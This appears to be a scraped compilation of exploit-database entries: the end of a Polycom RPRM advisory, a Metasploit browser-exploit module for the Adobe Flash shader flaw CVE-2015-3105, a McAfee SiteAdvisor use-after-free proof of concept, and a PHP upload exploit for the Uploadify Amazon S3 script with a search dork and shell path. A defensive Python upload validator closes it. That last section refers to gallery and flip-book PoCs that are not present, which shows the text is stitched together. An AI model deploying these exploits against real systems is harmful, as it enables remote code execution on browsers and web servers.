2015-06-18: SEC Consult asks for reassurance that v8.4 fixes reported
vulnerabilities since 8.4's release notes do not mention
any fixes.
2015-06-22: Received a list confirming that the vulnerabilities were fixed.
2015-06-26: Coordinated release of security advisory.
Solution:
- ---------
Update to RPRM v8.4.
For further information see the following URL of the vendor:
http://support.polycom.com/PolycomService/support/us/support/network/management_scheduling/realpresence_resource_manager.html
Exception:
RPRM v8.4 does _not_ address the weakness described in section 7
(Weak/Missing Authorization).
Workaround:
- -----------
None.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF SEC Consult Vulnerability Lab / @2015
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
-----END PGP SIGNATURE-----
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
'Description' => %q{
This module exploits a memory corruption happening when applying a Shader as a drawing fill,
as exploited in the wild in June 2015. This module has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3105'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
<meta name="generator" content="PSPad editor, www.pspad.com">
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
</head>
<body>
<script>
/*
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
Author: Marcin Ressel
Twitter: https://twitter.com/m_ressel
NPMcFFPlg32.dll
McAfee SiteAdvisor 3.7.2
Tested on: Windows 8.1 (x64) and firefox 38.0.5
Homepage: https://www.siteadvisor.com/
Note: this vuln potentially gives us the possibility to brute-force base modules in memory
to bypass ASLR/DEP, because the bug doesn't have a negative impact on the web browser process;
I mean Firefox will not crash after triggering the UAF in McAfee.
0:107> !gflag
Current NtGlobalFlag contents: 0x02001800
htg - Enable heap tagging
ust - Create user mode stack trace database
hpa - Place heap allocations at ends of pages
0:107> g
(1d68.1b54): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
NPMcFFPlg32!CreateFFScriptable+0x141:
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
...
6f40437a 8b02 mov eax,dword ptr [edx]
6f40437c 85c0 test eax,eax
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
6f404380 8b00 mov eax,dword ptr [eax]
6f404382 8b4808 mov ecx,dword ptr [eax+8]
6f404385 8b4004 mov eax,dword ptr [eax+4]
6f404388 49 dec ecx
6f404389 234a08 and ecx,dword ptr [edx+8]
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
6f40438f 8b00 mov eax,dword ptr [eax]
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
6f404396 8d45d0 lea eax,[ebp-30h]
6f404399 50 push eax
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f40439f 8bd0 mov edx,eax
6f4043a1 8b02 mov eax,dword ptr [edx]
6f4043a3 85c0 test eax,eax
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
6f4043a7 8b00 mov eax,dword ptr [eax]
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
6f4043af 49 dec ecx
6f4043b0 234a08 and ecx,dword ptr [edx+8]
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
6f4043b9 50 push eax
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
6f4043bf 8bd0 mov edx,eax
...
*/
var win = null;
function crash()
{
var doc = win.document;
var obj = doc;
win.close();
for(var p in obj)
{
if(typeof obj[p] == 'string')
{
try{ obj[p] = "CCCC"; }catch(err){}
}
}
}
win = window.open('data:text/html,','','width=20,height=20'); // you need to disable the popup blocker
win.onload = crash;
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
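The three upload issues on this page (Drag & Drop Gallery, Flip Book and the Uploadify Amazon S3 script) share one root cause: the handler stores whatever filename the client sends. The PoCs rely on two tricks, a bare .php name and a double extension such as db.php.gif, which some server configurations still execute as PHP. The Python below is an added example of the server-side validation a defender would want, not code from any of these projects; the extension allow-list and the set of executable extensions are assumptions to be adjusted per deployment.

```python
import os
import re
import secrets

# What a gallery handler should accept. Assumption for this example.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Extensions that must not appear in ANY segment of the name, not only the
# last one, because "x.php.gif" is executed as PHP by some configurations.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                         "jsp", "asp", "aspx", "cgi", "pl", "py", "sh"}

_SAFE_CHARS = re.compile(r"^[A-Za-z0-9._-]+$")


def validate_upload_name(filename):
    """Return (ok, reason). The checks are independent so the reason names
    the rule that rejected the file, which is what you want in an audit log."""
    # Drop any directory component the client sent (tools may send full paths).
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name in (".", ".."):
        return False, "empty or dot name"
    if not _SAFE_CHARS.match(name):
        return False, "disallowed characters"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension or leading dot"
    exts = parts[1:]
    if any(not e for e in exts):
        return False, "empty extension segment"
    # Every segment is inspected: "db.php.gif" is rejected here.
    for ext in exts:
        if ext in EXECUTABLE_EXTENSIONS:
            return False, "executable extension segment: ." + ext
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allow-list: ." + exts[-1]
    return True, "ok"


def stored_name_for(filename):
    """Server-chosen storage name: random stem plus the validated extension,
    so the client controls neither directory nor stem. None if rejected."""
    ok, _ = validate_upload_name(filename)
    if not ok:
        return None
    ext = os.path.basename(filename.replace("\\", "/")).rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for candidate in ("db.php.gif", "lo.php", "holiday.jpg", "../../../etc/passwd"):
        print(candidate, "->", validate_upload_name(candidate))
```

Pair this with storing uploads outside the document root (or under a directory where script execution is disabled) and with content sniffing of the first bytes; name validation alone stops the PoCs shown here but is only one layer.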